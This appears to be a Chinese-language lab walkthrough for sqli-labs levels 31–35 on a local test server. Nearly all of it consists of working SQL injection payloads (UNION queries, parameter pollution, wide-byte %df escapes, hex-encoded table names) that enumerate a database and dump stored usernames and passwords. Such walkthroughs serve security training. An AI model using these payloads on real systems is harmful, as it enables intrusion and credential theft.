sqli-labs靶场通关攻略 31-35

主页有sqli-labs靶场通关攻略 1-30

第三一关 less-31

闭合方式为?id=1&id=1 ") --+

步骤一：查看数据库名

http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%201,database(),3%20--+

 步骤二：查看表名

http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27%20--+

 步骤三：查看users表中列名

http://127.0.0.1/less-31/?id=1&id=-1%22)%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27%20--+

 步骤四：查看信息

http://127.0.0.1/less-31/?id=1&id=-1%22)union%20select%201,2,group_concat(id,username,password)%20from%20users%20--+

第三二关 less-32

宽字节注入%df

步骤一：查询闭合方式 ?id=1%df' --+

http://127.0.0.1/less-32/?id=1%df%27%20--+

步骤二：查看数据库名

http://127.0.0.1/less-32/?id=-1%df%27%20union%20select%201,database(),3%20--+

  步骤三：查看表名

http://127.0.0.1/less-32/?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+

  步骤四：查看users表中列名

http://127.0.0.1/less-32/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273%20--+

 步骤五：查看信息

http://127.0.0.1/less-32/?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

第三三关 less-33

  步骤一：查询闭合方式 ?id=1%df' --+

http://127.0.0.1/less-33/?id=1%df%27%20--+

 步骤二：查看数据库名

http://127.0.0.1/less-33/?id=-1%df%27%20union%20select%201,database(),3%20--+

   步骤三：查看表名

http://127.0.0.1/less-33/?id=-1%df%27%20union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()%20--+

   步骤四：查看users表中列名

http://127.0.0.1/less-33/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_schema=database()%20and%20table_name=0x7573657273%20--+

  步骤五：查看信息

http://127.0.0.1/less-33/?id=-1%df%27%20union%20select%201,group_concat(password,username),3%20from%20users--+

第三四关 less-34

步骤一：输入Username：admin Password：admin 利用Burp抓包

步骤二：查看数据库名

uname=-1%df'union select 1,database()#

步骤三：查看表名

uname=-1%df%27%20union%20select%201,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database()#

步骤四：查询users表中列名

uname=-1%df'union select 1,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=0x7573657273#

步骤五：查看users表中信息

uname=-1%df'union select 1,group_concat(id,username,password) from users #

第三五关 less-35

步骤一：查询数据库

?id=-1 union select 1,2,database()--+

步骤二：查看表名

?id=-1 union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

步骤三：查询users表中列名

?id=-1 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=database() and table_name=0x7573657273--+

步骤四：查看信息

?id=-1 union select 1,group_concat(password,username),3 from users--+